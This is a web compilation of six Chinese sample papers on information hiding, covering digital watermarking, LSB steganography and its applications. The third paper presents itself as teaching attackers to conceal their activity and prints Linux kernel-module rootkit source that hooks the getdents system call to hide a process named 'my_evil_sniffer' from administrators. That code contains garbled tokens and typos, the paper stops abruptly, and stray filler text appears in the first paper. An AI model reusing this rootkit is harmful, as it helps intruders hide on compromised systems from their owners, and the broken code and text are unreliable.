隐藏技术论文范例6篇

隐藏技术论文

隐藏技术论文范文1

关键词:信息安全,信息隐藏

 

一、关于信息隐藏

所谓的信息隐藏,是利用媒体信息普遍存在的冗余特性,将秘密信息隐藏在其他媒体信息中,其首要目标就是使加入隐藏信息后的媒体目标的质量下降,尽可能地小,使人无法觉察到隐藏的数据,或者知道它的存在,但未经授权者无法知道它的位置。并不像传统加密过的文件一样,看起来是一堆会激发非法拦截者破解机密资料动机的乱码,而是看起来和其它非机密性的一般资料无异,因而十分容易逃过非法拦截者的破解。其道理如同生物学上的保护色,巧妙地将自己伪装隐藏于环境中,免于被天敌发现而遭受攻击。被人们誉为历史学之父的古希腊历史学家希罗多德(Herodotus, 486―425),在其著作中讲述了这样一则故事:一个名叫Histaieus的人筹划着与他的朋友合伙发起叛乱,里应外合,以便推翻波斯人的统治。他找来一位忠诚的奴隶,剃光其头发并把消息刺在头皮上,等到头发又长起来了,把这人派出去送“信”,最后叛乱成功了。

信息隐藏技术是20世纪90年代中期从国外兴起的一门集多学科理论与技术与一身的新兴技术领域,它涉及感知科学、信息论、密码学等多个学科领域,涵盖信号处理、扩频通信、图像处理等多种专业技术的研究方向。

人的眼睛或耳朵本身对某些信息都有一定的掩蔽效应,利用人的这些特点,可以很好地将信息隐藏而不被察觉。信息隐藏过程一般由密钥来控制,通过嵌入算法将有意义的信息即嵌入对象隐藏于掩护对象中,从而生成隐密载体,隐密载体通过信道传输到接受端。在密钥的控制下采用特定的提取算法从隐藏载体中提取出嵌入对象,利用密钥从中恢复或检测出隐藏的秘密信息,从而使用户获得真实可靠的信息。使非法者不知道这个载体信息中是否隐藏了其它的信息,而且即使知道,也难以提取隐藏的信息,从而实现信息的保密。

据目前已经提出的信息隐藏算法,从它们对载体的修改方式上进行分类,可以分为:时域(空域)替换技术、变换域技术、扩展频谱技术、统计方法等等。

二、信息隐藏的特点

利用不同的媒体进行信息掩藏时有着不同的特点,但是它们都必须具有下列基本特征。

1.隐蔽性。指嵌入信息后在不引起秘密信息质量下降的前提下,不显著改变掩护对象的外部特征,即不引起人们感官上对掩护对象变化的察觉。以使非法拦截者无法判断是否有秘密信息的存在。

2.不可测性。指隐蔽载体与原始载体具有一致的特性,即非法拦截者要检测到秘密信息的存在并提取出来应相当困难,至少在秘密信息的有效期内是不可能的。

3.不可见性。利用人类视觉系统和听觉系统的属性,经过一系列隐藏处理, 使目标资料没有明显的降质现象,而隐藏的资料却无法人为地看见或听见.

4.鲁棒性。指不因图像文件的某种改动而导致隐藏信息丢失的能力。这里所谓“改动”包括传输过程中的隐藏载体对一般的信号处理(如滤波、增强、重采样、有损压缩等)、一般的几何变换(如平移、旋转、缩放、分割等)和恶意攻击等情况,即隐藏载体不会因为这些操作而丢失了隐藏的秘密信息。

5.自恢复性。论文大全。指经过了一些操作和变换后,可能会使隐蔽载体受到较大的破坏,如果只留下部分的数据,在不需要宿主信号的情况下,却仍然能恢复隐藏信息的特征就是所谓的自恢复性。

6.安全性。指隐藏算法有较强的抗攻击能力,即它必须能够承受一定程度的人为攻击,而使隐藏信息不会被破坏。

三、信息隐藏的应用

在信息安全领域中,信息隐藏技术的应用可归结为下列几个方面。

1.数字知识产权保护

知识产权保护是信息隐藏技术中数字水印技术和数字指纹技术所力图解决的重要问题,信息隐藏技术的绝大部分研究成果都是在这一应用领域中取得的。随着网络和数字技术的快速普及,通过网络向人们提供的数字服务也会越来越多,如数字图书馆、数字图书出版、数字电视、数字新闻等。这些服务提供的都是数字产品,数字产品具有易修改、易复制、易窃取的特点,因此,当前的数字知识产权保护就已经成为迫切需要解决的实际问题。

信息隐藏技术应用于版权保护时,所嵌入的签字信号通常被称作“数字水印”,数字水印技术可以成为解决此难题的一种方案。现在越来越多的视频信号、音频信号和数字图像中被贴上了不可见的标签,用以防止非法拷贝和数据跟踪。服务提供商在向用户发送产品的同时,将双方的信息代码以水印的形式隐藏在作品中,这种水印从理论上讲应该是不被破坏的。论文大全。当发现数字产品在非法传播时,可以通过提取出的水印代码追查非法散播者。其主要特点是版权保护所需嵌入的数据量小,对签字信号的安全性和鲁棒性要求很高。

2.数据完整性鉴定

使用数字水印技术有一定的缺陷,用于数字水印技术保护的媒体一旦被篡改水印就会被破坏,从而很容易被识别。在数字票据中隐藏的水印经过打印后仍然存在,可以通过再扫描回数字形式,提取防伪水印,以证实票据的真实性。数据完整性鉴定是指对某一信号的真伪或完整性的判别,并需要进一步指出该信号与原始真实信号的差别,以确认资料在网上传输或存储过程中并没有被篡改、破坏或丢失。假定接收到一个如音频、视频或图像等多媒体信号,并初步判断它很可能是某一原始真实信号的修改版本,数据篡改验证的任务就是在对原始信号的具体内容不可知的情况下,以最大的可能判断是否是真实的。首先,要充分利用数据库管理系统提供的数据完整性的约束机制和各种输入数据的引用完整性约束设计,以便保证数据完整、准确的输入和储存。其次,在数据传输过程中可视情况选用相应的数据校验方式对传输数据进行校验检查。

3.数据保密

在网络上传输秘密数据要防止非法用户的截获和使用,这是网络安全的一个重要内容,随着信息技术的发展以及经济的全球化,这一点不仅涉及政治、军事领域,还将涉及到商业、金融机密和个人隐私。信息隐藏技术为网上交流的信息采取了有效的保护,比如电子政务中敏感信息、电子商务中的秘密协议和合同、网上银行交易的重要数据、重要文件的数字签名以及个人隐私等,还可以对一些不愿为别人所知道的内容使用信息隐藏方式进行隐藏储存,从而使数据得到保密,保证了信息的安全性。论文大全。

4.资料不可抵赖性的确认

在网上交易中,交易双方的任何一方不能抵赖自己曾经做出的行为,也不能否认曾经接收到对方的信息,这是交易系统中一个重要环节。这可以使用信息隐藏技术,在交易体系的任何一方发送和接收信息时,将各自的特征标记形式加入到传递的信息中,这些标记应是不能被去除的,从而达到确认其行为的目的。

结论

总之,信息隐藏技术是多媒体通信和多媒体信号处理领域中近年来新兴的研究方向,它为信息安全提供了一种新的思路,为我们研究信息安全提供了一个新的方向.

目前国际上先进的信息隐藏技术已能做到隐藏的信息可以经受人的感觉检测和仪器的检测,并能抵抗一些人为的攻击。但总的来说,信息隐藏技术尚没有发展到可实用的阶段,使用密码加密仍是网络信息传输的主要安全手段。虽然目前对信息隐藏的研究有了很大的进展,在信息安全中起到了重要的作用,但存在大量的实际问题亟待解决,如信息隐藏的容量问题,如何建立不可感知性的数学度量模型,信息隐藏的容量上界如何计算等;信息隐藏的对立面――隐藏分析如何得到同步发展;如何对信息隐藏进行分析和分类;如何找到信息隐藏技术自己的理论依据,形成完善和科学的理论体系等等。

信息隐藏是一项崭新的技术领域,也是多媒体技术、网络技术研究的前沿,应用前景十分广阔,必将吸引广大图像、语音、网络、人工智能等领域的研究者加入到这一行列,从而推动信息安全技术更快的发展。

参考文献:

[1] 张作林,陈建华.基于区域的信息隐藏技术[J].福建电脑,2005,3.

[2] 张书真.信息安全中的信息隐藏技术[J].电脑知识与技术.2005,18.

[3] 陈 波,谭运猛,吴世忠.信息隐藏技术综述[J].计算机与数字工程.2005,2.

[4] 左伟明,秦姣华.信息隐藏技术研究[J].湖南城市学院学报.2005,3.

[5] 江早.信息隐藏――种崭新的信息安全技术[J].中国图象图形学报.2005,2.

隐藏技术论文范文2

关键词:信息隐藏;信息安全;应用

中图分类号:TN918.6

当今社会已经进入到了一体化的网络时代,网络成为最重要的传媒手段,各种信息都通过网络进行传播,包括个人信息、军事信息、私密信息等,如何在这种开放的环境中,最大程度保证信息的安全,是当下网络技术的热点话题。但是随着信息技术的发展,计算机处理信息的能力也有所增强,传统的秘钥不再能保证信息的绝对安全,因此数据的隐藏技术成为了热点,也是保护信息的重要手段。

1 信息隐藏技术概述

1.1 信息隐藏技术基本内涵。信息隐藏技术主要是将秘密信息隐藏在普通的文件中,并通过数字化的信号进行处理,这样通过对于用户的视觉冗余来进行隐藏,最大程度保证信息的安全性。隐藏后的信息会使媒体的搜索目标变小,甚至无法发现,这样秘密的信息和文件便可以通过这种形式来保护信息。信息隐藏技术目前应用比较广广泛,主要包括以下内容。首先是隐藏术,主要内容是进行秘密形式的通信,并且将信息藏匿与其他的普通信息中,信息隐藏主要是以第三方信息保护的形式,便于将信息传输到目的客户端。第二是数字水印,可以是作者的序列号、公司的标识等,主要是能证明被保护的信息或者文件可以被证明以及查询侵权的一种途径。第三是数据嵌入。在不同形式的信息中,技术模式吸取了隐藏术与水印的优势,并通过嵌入的方式对于秘密信息进行保护。第四是指纹与标签,是水印的一种特殊用途,水印的每个特定的信息可以进行信息的拷贝。

1.2 信息隐藏技术的特点。信息隐藏技术与传统的信息加密不同,基本目的并不是限制文件资料的提取与保存,而是将数据信息隐藏最小化。除此之外,信息隐藏技术还要充分考虑到信息在通过多种程序处理之后,仍然具备可以运行操作的性质,不会被破坏基础属性,因此信息隐藏技术需要具备以下特点。

(1)隐蔽性。信息隐藏的首要特性便是隐蔽性,主要指的是信息在嵌入之后,最大程度避免信息质量的改变,同时也能掩饰信息的基本特征,在传输过程中不会引起察觉,在视觉方面可以很好保护信息不被发现,保证原始信息的一致性。例如拥有相同的统计分布,这样变会混淆拦截者的信息判断能力,保证信息的安全;(2)安全性。隐藏技术需要具备较强的安全性能,可以有效避免黑客的侵袭与共计,最大程度保护隐藏信息的安全;(3)恢复性。被保护的信息会经过多重程序进行处理与改变,因此特性上会发生一定改变,如果原始信息受到了破坏,那么隐藏技术需要通过保存下来的信息来恢复原来的文件,这样保证传输的信息准确性。

2 信息隐藏的技术方法

2.1 替换技术。人的感官系统对于一些细小的变化比较敏感,因此替换技术的核心就在于改变这些被保护文件中秘密的细节部分,并不被非法用户注意。这种形式并不会影响被保护信息的性质,而且可以对于被保护信息进行编码程序,当前应用比较广泛的替换技术包括最低比例的一换技术、随机的替换技术、特定区域替换技术等等。

2.2 变换技术。绝大多数的信息隐藏技术都是通过正交变换域来实现的,由此可见变换技术核心是通过扩频技术和密码学原理,将被保护的信息嵌入到普通信息的变换域中,同时利用算法来进行信息的提取,转换为隐蔽的形式。这种变换技术充分利用了人体感官对于空间频率差异的敏感程度,进而改变被保护信息的性质,确保信息不被察觉。

2.3 扩频技术。被保护信息在进行隐藏的过程中,有可能会导致信息的破坏,甚至信息的消除,因此为了保护信息的原始特性,可以利用重复编码的形式来进行扩频。在被保护的信息中插入一个参数,确保信息在处理后仍然可以进行扩频,通常选择高速率的随机码来进行发送,而且这种信息数据自身的信号也可以完成扩展。

3 信息隐藏技术的应用

3.1 数字水印技术的应用。数字水印技术是信息隐藏技术最重要的一种形式,主要是通过在多媒体中插入不可感知的信息,因而实现对于信息的保护以及对于操作的记录、跟踪。

(1)版权保护。在数字水印技术的应用中,版权保护是最重要的内容,主要是将重要的版权信息嵌入到图像、音频、文本中,目的是进行区分、标识以及解释版权。在一些逐步实现数字化的行业,例如数字图书馆、数字新闻等,很多信息容易受到篡改,知识产权保护能力比较差,因此通过信息隐藏技术中的水印技术,既可以最大程度保持作品的原始性,又难以被非法用户进行篡改,通过特殊标识的嵌入,可以是数字、文字、图标,与原始文件的结合,不会严重破坏数据的功能,还能具备一定的商用价值。这种水印通常情况下是不可见的,特别是在涉及知识产权纠纷中,可以通过特定秘钥提取出水印,进而实现保护自主知识产权的目的;(2)指纹识别。通过数字水印技术可以在文件中标注出授权的单位以及特殊名称,通过文件的原始性保证在特殊处理之后以及用户的接受、存储之后,文件特性不会发生改变。因此如果在被保护文件通过隐藏技术传输之后,便可以标注的信息追踪到文件的相关责任人,这样对于调查、规则也有据可循。这种指纹识别的技术实质是一种跟踪功能,特别是在数字产品的应用中,版权人可以将不同用户的序列号进行处理,嵌入到这些合法的拷贝中,这样在出售合法的拷贝的时候,可以与嵌入的信息相对照,如果是非法的、未经授权的拷贝产品,版权人便可以通过指纹来追踪,进而找寻到泄密者。

3.2 隐藏通信技术的应用。隐藏通信技术主要是将被保护的秘密的信息、文件隐匿于某些普通的公开文件中,进而保证在传输过程中秘密信息的安全性。以隐藏载体形式的不同,可以划分为文本的隐藏、语音的隐藏和视频的隐藏等。在实践中主要应用于数据的保密,例如在电子商务中时常会涉及到一些重要的信息,如商业机密、秘密协议、金融交易等,这些重要的数据信息一旦泄露可能会为个人或者企业带来损失,因此防止非法用户中途拦截这些数据,便可以采用隐藏通信技术,将信息以隐藏的形式进行传输,有效避免非法用户的拦截,最大程度保证信息安全。

4 结束语

信息隐藏技术方式多样,应用灵活,在未来的信息保护中将会得到广泛应用,但是这种技术手段目前还在发展阶段,在理论体系方面还在不断趋于成熟与完善,特别是在现实应用中还有待于进一步优化,存在的问题亟待解决。例如数字水印模型的构建、抗攻击性的提升等等,在算法上也在逐步完善。信息隐藏技术作为一把双刃剑,在应用方面也要利用特征优势,更好地为当下的信息传输做贡献。

参考文献:

[1]戴跃伟.信息隐藏技术的理论及应用研究[D].南京理工大学,2012.

[2]刘洁.信息隐藏技术及应用[J].现代情报,2011.

[3]尹兰.基于文本的信息隐藏技术的研究[D].贵州大学,2007.

[4]高真.密文图像中的可逆信息隐藏算法研究[D].重庆大学,2013.

[5]特列克别克・米沙.一种新的信息隐藏算法的设计研究[D].电子科技大学,2013.

[6]韩敏,董俊磊.浅谈信息隐藏技术的理论及应用[J].黑龙江科技信息,2009(05).

隐藏技术论文范文3

关键字:网络攻击;进程活动;隐藏;通道

中图分类号:TP393文献标识码:A文章编号:1009-3044(2007)04-10961-03

1 引言

攻击活动是一系列连续操作,若攻击时一不小心露出马脚,所有前面的攻击就会付诸东流,甚至会“引火烧身”。基于这样的认识,精明的网络攻击者特别注意隐藏攻击活动。

隐藏技术在计算机系统安全中应用十分广泛,尤其是在网络攻击中,当攻击者成功侵入一个系统后,有效隐藏攻击者的文件、进程及其加载的模块变得尤为重要。本文将讨论网络攻击活动中文件、进程、网络连接及通道的高级隐藏技术,这些技术有的已经被广泛应用到各种后门或安全检测程序之中,而有一些则刚刚起步,仍然处在讨论阶段,应用很少。

2 进程活动隐藏技术

攻击者在目标系统进行攻击活动时,产生攻击进程,如果不将这些攻击进程隐藏在系统中,就会被网络安全管理人员发现。例如,攻击者注册到某台Linux主机时,系统管理人员使用ps-ef | grep in.telnetd命令就可以察觉。攻击者可以通过修改系统的进程管理模块,替换进程管理核心模块,控制进程的显示,主要是netstat、ps等命令。下面给出Linux系统下隐藏进程源程序的例子:

extern void* sys_call_table[];

/*隐藏进程名称*/

char mtroj[]="my_evil_sniffer";

int (*orig_getdnts)(unsigned int fd,struct dirent *dirp,unsigned int coumt);

/*convert a string to number*/

int myatoi(char *str)

{ int res=0;

int mul=1;

char *ptr;

for(ptr=str+strlen(str)-1;ptr>=str;ptr--) {

if(*ptr'9')

return(-1);

res+=(*ptr-'0') *mul;

mul*=10;}

return (res);}

/*从task structure中获取进程号*/

struct task_struct *get_task(pid_t pid)

{ struct task_struck *p=current;

do { if (p->pid==pid)

returnp;

p=p->next_task; }

while (p!=current);

return NULL;}

/*从task structure获取进程名称*/

static inline char *task_name(struct task_struct *p,char *buf)

{ int i; char *name;

name=p->comm;

i=sizeof(p->comm);

do {unsigned char c=*name;

name++; i--;

*buf=c;

if (!c);

break;

if (c=='\\') {

buf[1]=c; buf+=2;

continue; }

if (c= ='\n') {

buf[0]='\\';

buf[1]='n'; buf+=2;

continue; }

buf++;}

while (i);

*buf=’\n’;

return buf+1;}

/*确认需要隐藏的进程*/

int invisible (pid_t pid)

{struct task_struct *task=get_task (pid);

char *buffer;

if (task) {

buffer=kmalloc (200,GFP_KERNEL);

memset (buffer,0,200);

task_name (task,buffer);

if (strstr (buffer, (char *) &mtroj)) {

kfree (buffer);

return 1; }

}return 0;}

int hacked_getdents (unsigned int fd, struct dirent *dirp, unsigned int count)

{unsigned int tmp,n;

int t,proc=0;

struct inode *dinode;

struct dirent dirp2,dirp3;

tmp=(*orig_getdents) (fd,dirp,count);

#idef _LINUX_DCACHE_H

dinode=current->files->fd[fd]->d_inode;

#else

dinode=current->files->f_inode;

#endif

if (dinode->i_ino= =PROC_ROOT_INO && !MAJOR (dinode->I_dev) &&

MINOR (dinode->I_dev) = =1)

proc=1;

if (tmp>0) {

dirp2= (struct dirent *) kmalloc (tmp, GFP_KERNEL);

memcpy_fromfs( dirp2,dirp,tmp);

dirp3=dirp2;t=tmp;

while (t>0) {

n=dirp3->d_reclen;

t-=n;

if ((proc && invisble (myatoi (dirp3->d_name)))) {

if (t!=0)

memmove (dirp3, (char *)dirp3+dirp3->d_reclen,t);

else

dirp3->d_off=1024;

tmp-=n;}

if (t!=0)

dirp3= (struct dirent *) ((char *) dirp3+dirp3->d_reclen);}

memcpy_tofs (dirp,dirp2,tmp);

kfree (dirp2);}

return tmp;

int init_module (void)/*module setup*/

{orig_getdents=sys_call_table[SYS_getdents];

sys_call_table[SYS_getdents]=hacked_getdents;return 0;}

void cleanup_module (void)/*module shutdown*/

{sys_call_table[SYS_getdents]=orig_getdents;}

隐藏技术论文范文4

关键词:信息;隐藏技术;相关研究

DOI:10.16640/ki.37-1222/t.2016.11.135

0 引言

随着科技的进步,通信技术的飞跃式发展,计算机互联网的迅速普及,使得越来越多的人和公司通过网络传输大量的数据文件,但是由于互联网具有连接形式多样性以及开放性和互联性,使得这些互联网上传输的数据文件很容易受到攻击或窃取,如果涉及国家安全和军队建设乃至个人的隐私信息方面,信息安全问题将变的更加敏感。查阅文献,发现现阶段研究人员关注的热点有俩个,即信息加密和信息隐藏,其中信息隐藏就是把需要传递的秘密信息进行伪装,隐藏在普通文件中,即使文件被攻击、窃取,也不易发现其中的隐藏信息,可以有效的加强信息在传输过程中的安全性,因此有必要对信息隐藏技术进行进一步的研究。

1 信息隐藏技术的含义

信息隐藏是利用人类对多媒体数字信号不敏感,将秘密信息隐藏在一个不被关注的多媒体信号中,这样敏感信息不会被发现,而且也不会影响到多媒体信号的感觉效果和使用价值,当我们利用这样的技术传输敏感信息时,可以对第三方起到混淆的作用。一般来说隐秘信息的载体选择有多种类型,比如我们经常见到的图像、声音、视频还有文档都可以作为敏感信息的载体,这样做的目的是不引人注目,其次即使载体信息被截获,也很难对隐藏信息进行提取,安全性得到了极大的提高。

2 信息隐藏的具体方法

参考传统加密技术方法,我们有保留的基础上对信息隐藏技术进行了一定的改进。常用的具体方法有数字水印技术、叠像技术以及替声技术等。其中,叠像技术是1994年提出的可视密码术(VisualCryptography),用有意义的明文图像代替原来的随机噪声图象,使之更具安全性。数字水印(Digital Watermarking)技术是将一些标识信息(即数字水印)直接嵌入数字载体中,但不影响原载体的使用价值,也不容易被人的知觉系统觉察。通过这些隐藏在载体中的信息,可以达到确认内容创建者、购买者、传送隐秘信息或者判断载体是否被篡改等目的。替声技术与叠像技术很相似,它是通过对声音信息的处理,使得原来的对象和内容都发生改变,从而达到将真正的声音信息隐藏起来的目的。替声技术可以用于制作安全电话,使用这种电话,可以对通信内容加以保密。

(1)替换技术。把秘密信息伪装成载体荣誉部分,进行替换后载体的可视性并没有被破坏,常用的手段有最小有效位替换、伪装随机替换,载体的奇偶位对换,图像的调色板替换等。

(2)变换技术。将秘密信息做正交变换,利用扩频技术把变换后的秘密信息隐藏到载体的变换域中。这种技术的优点是,它通过不同的空间频率敏感的感官系统来确定秘密信息具体的嵌入位置及嵌入强度,有效的对嵌入信息进行了隐藏。

(3)扩频技术。当对隐藏秘密信息的载体做过滤操作的时候,秘密信息可能被部分过滤,造成秘密信息丢失。在嵌入秘密信息时进行多次重复的代码扩展,对载体进行过滤时,秘密信息保留的概率大大增加。信息数据率高许多倍伪随机码把包含基带信号的频谱数据进行扩展,形成宽频带低功率谱密度的信号。

3 信息隐藏的特点

信息隐藏有不同的分支,但所有分支都有很多共同的特点。第一,信息隐藏系统必须保证隐藏信息的不可见性,即在把秘密信息嵌入载体的过程中不能留下任何的痕迹,如果这一过程影响到图像质量,图像信息嵌入价值将减少,信息隐藏系统安全性降低。 其次,在对载体进行矢量变换操作以后,载体中的隐藏信息任然可以保持完整,并可以极大的概率被提取。 第三,要实现隐藏信息在载体中的不可见性,隐藏信息的长度与载体的长度必须保持一个适度的量,因为载体容量与信息隐藏率是正比关系的。 第四,要足够安全,即攻击者不能有效的读取和修改载体中的秘密信息。

4 网络通信中信息隐藏技术的应用

网络通信中往往根据信息载体的不同,利用文本、语音、视频以及二进制的隐写,把秘密信息隐藏在具体的公开转播的数字多媒体信号中,使得秘密信息可以在网络中进行安全有效的传输的一种技术。

(1)数据保密。在公司之间进行谈判时,可能会利用网络传递一些敏感的信息,比如双方的协议、合同、报价等重要文件,包括数字签名,为了保护这些敏感信息的安全性,可以把这些信息以隐藏的形式传递给对方,这样我们就可以在非相关人员难以发觉的状态下完成彼此信息交流。

(2)数据的不可抵赖性。在网络上进行谈判,签订协议等行为,由于不能互相见面,为保证双方不能否认自己做过的承诺并且接受对方传递的条款,需要在传递的信息中加入签名水印,确认其行为目的。

(3)数据的完整性。为保证我们接收到的信息是真实的,没有在网络传递的过程中被篡改,可以在传递的具体多媒体数据中嵌入一个完整信息,收到多媒体数据后可以对完整信息进行提取,用于确定此多媒体数据是否被篡改。

信息隐藏技术是目前学术界倍受关注的一个热点领域,由于现代通信技术的爆炸式发展,互联网飞速普及,每时每刻都有海量的信息在网络上传输,对敏感信息安全进行保护变的更加具有现实意义。在众多研究人员的不懈努力下,信息隐藏技术取得很多的成果,但是,信息隐藏技术作为一个跨学科的技术体系,我们对它的研究还不是很完善,还有许多的问题没有解决。信息隐藏技术的成熟性、实用性还与密码加密的网络传输技术相比较,还有很大差距。但是,其潜在价值是无法估量的,在未来甚至是不可不取代的,我们相信,随着技术的进一步发展,信息隐藏技术将涌现出更多的思路和办法,将对信息安全系统的未来扮演重要的角色。

参考文献:

[1]王育民,张彤,黄继武.信息隐藏――理论与技术[M].北京清华大学出版社,2006.

[2]丁玮,齐东旭.数字图像变换及信息隐藏与伪装技术[F].计算机学报,1998,21(09):838-843.

隐藏技术论文范文5

关键词:自适应;信息隐藏;数字水印;空间域

中图分类号: TP309.2

文献标识码:A

0引言

信息隐藏是将重要信息嵌入到在其他媒体(载体) 中,在基本不改变载体的外部特征及使用价值的情况下,我们的感觉器官感觉不到载体外部的变化,从而实现重要信息的隐秘传递。信息隐藏的目的不在于限制正常的资料存取,而在于保证隐藏的信息不引起攻击者的注意和重视,从而减少被侵犯的可能性,摆脱数据加密技术的致命缺陷。现在的隐密通信方式一般都要求把消息先加密再隐藏, 即形成了“加密+ 隐藏”的安全通信模式,它较之单纯的密码加密方法更多了一层保护。信息隐藏与分析技术的研究无论在军事和民用方面都有着重要的意义,隐藏技术越来越多地应用于多媒体信息的版权保护及信息安全等领域。特别在军事上,各个国家都采用了信息隐藏技术,进行情报、间谍活动,用于信息战领域中。早在2001年9月美国HINDU新闻组就报道了头目“拉登”可能通过隐写图片向其同僚传递重要的信息、散布消息、筹集资金、组织恐怖袭击等[1],并成功地逃过了美国通信监管部门的监控。

目前用来作为信息隐藏的载体有文字、图像、语音或视频等多种不同格式的文件, 但使用方法没有本质的区别。其中图像由于冗余空间大,是目前用得最多的信息隐藏载体。在基于图像的信息隐藏技术中,有两种隐藏技术:基于变换域的隐藏技术和基于空间域的隐藏技术。其中基于变换域的隐藏技术鲁棒性比较好,但较难实现大量数据的隐藏,要实现大容量的信息隐藏主要使用基于空间域的隐藏技术。

1典型空间域隐藏技术分析

基于空间域的隐藏技术是直接改变图像元素的值, 一般是在图像的亮度或色带中加入隐藏的内容。最简单和有代表性的基于空间域的信息隐藏方案是将要隐藏的信息代替图像的最低有效位(LSB)或者多个不重要位平面的所有比特的算法,这里的隐藏信息指的是二值比特序列。其隐藏信息的原理如下:计算机用三个字节来表示颜色的红、绿、蓝三原色的分量数值,每个字节的最低位的变化对颜色的视觉影响很小而无法察觉,因此可以把红、绿、蓝三原色的分量数值的最低位(最小意义位) 视为冗余空间,把信息隐藏在这里。1993年,Tirkel等人[2]提出了数字图像水印的一种方法,该方法将m序列的伪随机信号以编码形式的水印嵌入到灰度图像数据的LSB中。为了能得到完整的LSB位平面而不引入噪声,图像通过自适应直方图处理,首先将每个像素值从8 bit压缩为7 bit,然后将编码信息作为像素值的第8个bit(即像素值的LSB),这一方法是单个LSB编码方法的扩展,在单个LSB编码方法中,LSB直接被编码信息所代替。

LSB 算法的优点是算法简单、嵌入速度快、隐藏容量比较大,这些优点是基于变换域的隐藏算法所无法比拟的。因此LSB算法仍然在信息隐藏中占有重要地位,几乎全部的隐写算法中都可以找到LSB 算法的影子, Internet上常见的隐写软件中也大都使用LSB 算法或LSB 的衍生算法[3]。由于使用了图像最不重要的像素位,因此算法的鲁棒性较差,嵌入信息很容易受到滤波、图像量化、几何变形和加噪等操作的攻击。针对LSB算法出现的缺陷,一些研究人员对空域图像水印技术进行了改进,使算法的稳健性和安全性得到了提高。文献[4]提出通过颜色量化的方法实现的,使原来需要8位来表示的256色图像量化到颜色数128 色,量化后的图像只用7 位来表示,剩余的那位(最高位)就可以作为冗余空间来存储隐藏信息。由于此时所用的冗余空间为最高位,也叫最大意义位(MSB),因此鲁棒性好,解决了LSB算法鲁棒性差的问题。该方法的缺点是嵌入后的图像的调色板大小发生改变, 而且对于原本256色的图像量化后,由于存在量化误差,图像的视觉质量会有不同程度的降低,其中最为严重的是在均匀渐变区域出现的伪轮廓,因此,必须降低质量才有可能实现信息嵌入[5]。目前,基于图像空间域的隐藏技术的研究目标主要有两个:一是在一定长度的可修改图像载体数据中,在不影响载体视觉效果的前提下,嵌入尽可能多的信息数据;二是提高其鲁棒性。本文在以上算法的基础上提出了一种鲁棒性和隐藏容量均优于LSB算法的空间域信息隐藏算法。

2本文算法

基于图像的信息隐藏可看为在强背景(原始图像)下叠加一个弱信号(被隐藏的信息),只要叠加的信号低于对比度门限(Contrast Sensitivity Threshold),视觉系统就无法感觉到信号的存在[6]。根据

人类视觉系统(Human Vision System,HVS)

的对比度特性,该门限值受背景照度、背景纹理复杂性和信号频率的影响。背景越亮,纹理越复杂(或者说边缘丰富),门限就越高[6,7],这现象称为亮度掩蔽和纹理掩蔽。HVS的对图像所具有的亮度掩蔽、边界掩蔽和纹理掩蔽等效应表明[8]:(1) 人眼对不同灰度具有不同的敏感性,通常对中等灰度最为敏感,而且向低灰度和高灰度两个方向非线性下降;(2) 对图像平滑区的噪声敏感,而对纹理区的噪声不敏感;(3) 边界信息对于人眼非常重要。根据人类视觉掩蔽特性可知:具有不同局部性质的区域在保证不可见性的前提下,可允许叠加的信号强度是不同的。对RGB彩色图像而言, 人类视觉系统并不是只有对LSB位不可感知,对于较亮的像素点,比LSB更高的某些位的变化同样是不可感知的,这些不可感知位同样可用来嵌入信息,从而进一步提高嵌入容量。利用以上HVS特性,本文提出多平面自适应隐藏方法,可获得较大的信息隐藏空间和较好的鲁棒性。其基本思路是根据每个像素点RGB三个颜色分量的亮度值的不同,确定是否隐藏信息、信息隐藏位置及信息的隐藏量。由于不是将信息隐藏在某个固定的平面位,这样既能解决LSB算法的鲁棒性差的问题,也没有MSB算法的颜色失真问题。具体算法如下 :

设24位的RGB彩色图像的每个像素RGB三个颜色分量分别为(r7,r6,r5,r4,r3,r2,r1,r0)、(g7,g6,g5,g4,g3,g2,g1,g0)、(b7,b6,b5,b4,b3,b2,b1,b0),对图像的每个像素点RGB三色的每一色进行单独嵌入处理,首先对红色分量进行处理,将(r7,r6,r5,r4,r3,r2,r1,r0)从高位至低位逐位进行检查,当第x位不为0时,则从第x-y位(y≥1)开始嵌入信息,一直嵌入到第z位,若z>x-y, 则该像素点的该分量不嵌入信息, 由于信息的嵌入是在一个非0位后的一个约定位开始,到另一个约定位结束,因此信息的提取只依赖参数y和z,不需要原始图像及辅助信息表等其他信息,是一种完全意义的盲提取。即:

ri,其他其中为该像素点红色分量第i位ri经过嵌入处理后的值,wj(j∈{1,2,…,L})为待嵌入的比特序列,j的值为前面已经嵌入的比特数,每嵌入1个比特j的值增加1,y的取值决定了嵌入强度,它需要在不可感知性和嵌入容量之间折中考虑,y值越大,视觉不可感知性越好,但可隐藏的信息量越少。z的取值由所需的抵御滤波处理的鲁棒性决定,当z=0时,则包括LSB位。处理完红色分量后,再用同样的方法处理该像素的蓝色和绿色分量,只是对蓝色和绿色分量,y的取值可以根据人类视觉系统特性取不同的值。处理完一个像素点后,再重复以上过程,处理下一个像素点。

设背景照度为I,根据Weber定律[9],在均匀背景下,人眼刚好可以识别的物体照度为I+I, I满足:

视觉领域的进一步研究表明, I与I的关系更接近指数关系[10]。有文献提出了更准确的对比度敏感度函数(CSF, Contrast Sensitivity Function):

其中I0为当I=0的对比度门限,α为常数,a∈ (0.6, 0.7)。

根据以上结论,y的取值为4至5时就可基本满足视觉不可见性要求,实验结果也证实如此。由于人眼对RGB三色的敏感度是不同的,人眼可感知的亮度值可由如下的公式计算:可见人眼对绿色最敏感,对蓝色最不敏感,它不到绿色的1/4,因此为了达到不可感知性的目的,在y值的选取上,绿色需要适当取大一点,蓝色分量的值则可取小一点。

3试验与讨论

